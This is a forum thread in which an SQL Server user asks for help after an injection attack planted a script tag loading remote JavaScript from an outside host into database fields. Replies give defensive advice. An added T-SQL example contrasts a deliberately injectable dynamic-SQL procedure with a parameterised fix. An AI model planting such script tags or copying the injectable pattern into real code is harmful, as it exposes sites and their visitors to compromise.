injection attack
Posted Wednesday, July 2, 2008 5:03 AM
Forum Newbie


Group: General Forum Members
Last Login: Tuesday, June 30, 2009 10:38 AM
Points: 3, Visits: 96
Please help me!
I'm under injection attack and I don't know what I can do.
This script ' script src=http://www.hdadwcd.com/b.js /script' was injected into my database (SQL Server 2000).
It was not only injected into many of the database fields but also renamed my publication to:
" publication name script src=http://www.hdadwcd.com/b.js /script "
How can I repair it and stop this injection?
How can I edit the binary fields in MSrepl_commands and delete this script from the command field?
Post #527164
Posted Wednesday, July 2, 2008 6:01 AM


SSC-Forever


Group: General Forum Members
Last Login: Yesterday @ 3:21 PM
Points: 42,495, Visits: 35,566
You need to find the application that is vulnerable to injection (you can use Profiler to see the commands coming to the database).

There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly access the tables but to use stored procs.

I would suggest that you drop the publication in question and recreate it.



Gail Shaw
Microsoft Certified Master: SQL Server 2008, MVP
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass

Post #527203
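The two changes recommended in the reply above (parameterised instead of built-up statements, and stored-procedure-only permissions), as an added T-SQL example that is not part of the original thread. The table `dbo.Articles`, both procedures and the database user `WebAppUser` are hypothetical names chosen for illustration.

```sql
-- Hypothetical table used only for this example.
CREATE TABLE dbo.Articles (
    ArticleID int IDENTITY(1,1) PRIMARY KEY,
    Title     varchar(200)  NOT NULL,
    Body      varchar(4000) NOT NULL
);
GO

-- BEFORE: built-up statement. @Title is pasted into the command text,
-- so whatever the web page passes in is parsed as T-SQL, not as data.
CREATE PROCEDURE dbo.SearchArticles_BuiltUp
    @Title varchar(200)
AS
    DECLARE @sql varchar(1000);
    SET @sql = 'SELECT ArticleID, Title FROM dbo.Articles '
             + 'WHERE Title LIKE ''%' + @Title + '%''';
    EXEC (@sql);  -- runs with the caller's own table permissions
GO

-- AFTER: static, parameterised statement. @Title is only ever a value
-- compared against the column; it never becomes part of the command.
CREATE PROCEDURE dbo.SearchArticles
    @Title varchar(200)
AS
    SET NOCOUNT ON;
    SELECT ArticleID, Title
    FROM dbo.Articles
    WHERE Title LIKE '%' + @Title + '%';
GO

-- Permissions: the web application's database user (hypothetical name)
-- may execute the procedure but has no direct access to the table.
-- The static procedure still works through ownership chaining because
-- it has the same owner as the table. The built-up version would fail
-- under these permissions, since EXEC() text is checked against the caller.
GRANT EXECUTE ON dbo.SearchArticles TO WebAppUser;
DENY SELECT, INSERT, UPDATE, DELETE ON dbo.Articles TO WebAppUser;
GO
```

The page code must also call the procedure through a parameterised command object; concatenating user input into an `EXEC dbo.SearchArticles '...'` string reintroduces the same flaw on the application side.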
Posted Thursday, July 3, 2008 3:59 PM


SSCertifiable


Group: General Forum Members
Last Login: Yesterday @ 6:58 PM
Points: 5,575, Visits: 24,827
When reading this, scroll up to the top of this page. In the upper frame you will see Search: type in the word "injection" (without the quotes) and then click the button labelled Go. Be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQLServerCentral.

If everything seems to be going well, you have obviously overlooked something.

Ron

Please help us, help you -before posting a question please read

Before posting a performance problem please read
Post #528427
Posted Thursday, July 24, 2008 3:29 AM
Forum Newbie


Group: General Forum Members
Last Login: Tuesday, June 30, 2009 10:38 AM
Points: 3, Visits: 96
Hi
Thank you for your last reply.
I resolved that problem by editing all tables and removing that script.
I think it was a new injection method.
This link was helpful:
http://www.msblog.org/index.php?s=yp
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

But I couldn’t resolve a part of the problem:
There were many Binary fields in MSrepl_commands containing bad script.
I deleted them because I couldn’t edit them.
I will be pleased to teach “how to edit MSrepl_commands command field and alter its data?”
Yours truly
saeed.
Post #539951
Posted Thursday, July 24, 2008 3:31 AM


SSC-Forever


Group: General Forum Members
Last Login: Yesterday @ 3:21 PM
Points: 42,495, Visits: 35,566
The safest fix is probably to completely drop the replication and recreate it.


Gail Shaw

Post #539955
Posted Friday, October 26, 2012 9:26 AM
Grasshopper


Group: General Forum Members
Last Login: Sunday, March 2, 2014 1:41 PM
Points: 18, Visits: 37
Wow, this is an old thread but still very pertinent.

We are rapidly migrating to SQL 2005.

But we were attacked by injection ... every varchar field in every table replaced with similar .js crap. We restored and the world was good.

But we're trying to find the vulnerability ... of the publicly visible pages on the site (only 5 or 6), all are derived with stored procs and / or our own in-house brewed trap.

We are told that SQL2005 and SQL2008 handle SQL injections far better.

We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right?

I'm babbling ... but beyond stored procs and home-grown filters, are there any other known hardware or software remedies?

You refer to a profiler to see commands ... where is that?
Post #1377677
Posted Friday, October 26, 2012 9:32 AM


SSC-Forever


Group: General Forum Members
Last Login: Yesterday @ 3:21 PM
Points: 42,495, Visits: 35,566
Can you post this in a new thread please?


Gail Shaw

Post #1377684
Posted Friday, October 26, 2012 9:38 AM
Grasshopper


Group: General Forum Members
Last Login: Sunday, March 2, 2014 1:41 PM
Points: 18, Visits: 37
Sorry .. by all means .. I'm new here ... my bad.

A new thread or somewhere you'd prefer?

Robert

Post #1377693
Posted Friday, October 26, 2012 9:43 AM


SSC-Forever


Group: General Forum Members
Last Login: Yesterday @ 3:21 PM
Points: 42,495, Visits: 35,566
New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.


Gail Shaw

Post #1377698
Posted Friday, October 26, 2012 9:48 AM
Grasshopper


Group: General Forum Members
Last Login: Sunday, March 2, 2014 1:41 PM
Points: 18, Visits: 37
Ok, will do BUT ... the main gist of this post was your mention of the "profiler"?
We are trying to determine the vulnerability?
Post #1377700